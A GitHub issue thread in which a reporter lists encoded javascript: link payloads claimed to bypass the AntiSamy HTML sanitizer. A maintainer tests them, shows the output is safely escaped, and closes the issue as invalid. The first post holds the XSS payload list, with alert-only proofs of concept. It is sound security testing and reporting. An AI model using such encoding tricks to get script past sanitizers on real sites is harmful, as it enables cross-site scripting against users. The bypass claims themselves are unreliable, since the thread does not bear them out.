### ISSUE TITLE
Filter Bypasses

### ISSUE THREAD

**Issue by faf0-addepar** [nahsra/antisamy#33]
The markup below shows multiple ways to bypass the AntiSamy filter.

- The list under the `NOT Sanitized by AntiSamy` shows a couple Javascript payloads that browsers execute (tested with Chrome 69), but won't be removed by AntiSamy.
- The list under the `Sanitized by AntiSamy` heading is sanitized correctly and just left here as a recommendation for tests.
- The list under the `Tricky Encoding with Ampersand Encoding` was created by taking one of the payloads under `NOT Sanitized by AntiSamy` and encoding all encountered ampersands, using different ways to encode an ampersand. One could repeat this process for any payload under `NOT Sanitized by AntiSamy`.

```html
<html>
  <head>
    <title>Test</title>
  </head>
  <body>
    <h1>Tricky Encoding</h1>
    <h2>NOT Sanitized by AntiSamy</h2>
    <ol>
      <li><a href="javascript&#00058x=alert,x%281%29">X&#00058;x</a></li>
      <li><a href="javascript&#00058y=alert,y%281%29">X&#00058;y</a></li>

      <li><a href="javascript&#58x=alert,x%281%29">X&#58;x</a></li>
      <li><a href="javascript&#58y=alert,y%281%29">X&#58;y</a></li>

      <li><a href="javascript&#x0003Ax=alert,x%281%29">X&#x0003A;x</a></li>
      <li><a href="javascript&#x0003Ay=alert,y%281%29">X&#x0003A;y</a></li>

      <li><a href="javascript&#x3Ax=alert,x%281%29">X&#x3A;x</a></li>
      <li><a href="javascript&#x3Ay=alert,y%281%29">X&#x3A;y</a></li>
    </ol>
    <h2>Sanitized by AntiSamy</h2>
    <ol>
      <li><a href="javascript&#00058;alert&lpar;1&rpar;">X&#00058;</a></li>
      <li><a href="javascript&#58;alert&lpar;1&rpar;">X&#58;</a></li>

      <li><a href="javascript&#x0003A;alert&lpar;1&rpar;">X&#x0003A;</a></li>
      <li><a href="javascript&#x3A;alert&lpar;1&rpar;">X&#x3A;</a></li>

      <li><a href="javascript&colon;alert&lpar;1&rpar;">X&colon;</a></li>
    </ol>

    <h1>Tricky Encoding with Ampersand Encoding</h1>
    <p>AntiSamy turns harmless payload into XSS by just decoding the encoded ampersands in the href attribute</a>
    <ol>
      <li><a href="javascript&amp;#x3Ax=alert,x%281%29">X&amp;#x3A;x</a></li>
      <li><a href="javascript&AMP;#x3Ax=alert,x%281%29">X&AMP;#x3A;x</a></li>

      <li><a href="javascript&#38;#x3Ax=alert,x%281%29">X&#38;#x3A;x</a></li>
      <li><a href="javascript&#00038;#x3Ax=alert,x%281%29">X&#00038;#x3A;x</a></li>

      <li><a href="javascript&#x26;#x3Ax=alert,x%281%29">X&#x26;#x3A;x</a></li>
      <li><a href="javascript&#x00026;#x3Ax=alert,x%281%29">X&#x00026;#x3A;x</a></li>
    </ol>
    <p><a href="javascript&#x3Ax=alert,x%281%29">Original without ampersand encoding</a></p>
  </body>
</html>
```

**Comment by davewichers** [comment]
OK. I started researching this yesterday but I can't replicate the misbehavior. This is what I'm seeing for the very first example under NOT Sanitized by AntiSamy:

Original: 
`<li><a href="javascript&#00058x=alert,x%281%29">X&#00058;x</a></li>`

getCleanHTML() Output: 
`<li> <a href="javascript&amp;#00058x=alert,x%281%29" rel="nofollow">X:x</a></li>`

And when I click on that link in (Chrome, FF, IE), I get a similar error in all of them:
   File Not Found for:  PATH/TO/javascript&#00058x=alert,x(1)

I'm using a slightly newer version of Chrome to test (73), and I'm simply copying the output of AntiSamy into a local HTML file and loading it in the browser. Am I doing something wrong in the way I'm testing this?  Seems to me that the encoding of the & to &amp; would make the encoded colon (:) now safe.

**Comment by davewichers** [comment]
And then for the first 'tricky' test, I'm seeing this:

Original:
`<li><a href="javascript&amp;#x3Ax=alert,x%281%29">X&amp;#x3A;x</a></li>`

getCleanHTML() Output:
`<li><a href="javascript&amp;#x3Ax=alert,x%281%29" rel="nofollow">X&amp;#x3A;x</a></li>`

And I'm not seeing the `&amp;` get decoded, so nothing dangerous here either.

**Comment by faf0-addepar** [comment]
Thanks @davewichers

> Am I doing something wrong in the way I'm testing this?

Seems perfectly fine.

> Seems to me that the encoding of the & to &amp; in the encoded colon (&#00058) would now make that safe.

That sounds correct.

Let me repeat these tests again with a standard configuration and report back.

**Comment by davewichers** [comment]
@faf0-addepar - Just to be perfectly clear, I didn't fix/change AntiSamy in any way. It already encoded the & the way I describe above.

**Comment by faf0-addepar** [comment]
@davewichers - thanks for the info. It's possible that I misconfigured AntiSamy on my end when I compiled this list.

**Comment by davewichers** [comment]
OK. I'm closing this then as 'invalid', but if you figure out how to make this bypass work, let us know! Hopefully you can't :-).
